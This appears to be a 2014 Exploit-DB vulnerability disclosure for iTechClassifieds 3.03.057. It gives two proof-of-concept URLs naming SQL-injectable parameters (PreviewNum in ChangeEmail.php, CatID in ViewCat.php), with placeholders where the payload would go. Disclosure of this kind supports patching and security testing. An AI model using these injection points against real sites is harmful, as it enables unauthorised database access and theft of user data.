iTechClassifieds 3.03.057 - SQL Injection

EDB-ID:

31140




Platform:

PHP

Date:

2014-01-23


# Exploit Title: iTechClassifieds v3.03.057 - SQL Injection
# Date: 23/01/2014
# Exploit Author: vinicius777
# Vendor Homepage: http://itechscripts.com/download.html
# Software Link: http://itechscripts.com/downloads/download_itechclassifieds.html
# Version: 3.03.057


[1] SQL Injection - PreviewNun 

PoC: http://localhost/iTechClassifieds_v3/ChangeEmail.php?PreviewNum=1' [SQL INJECTION]



[2] SQL Injection - CatID

PoC: http://localhost/iTechClassifieds_v3/ViewCat.php?CatID=[SQL INJECTION]


#
#
# Greetz to g0tm1lk and TheColonial.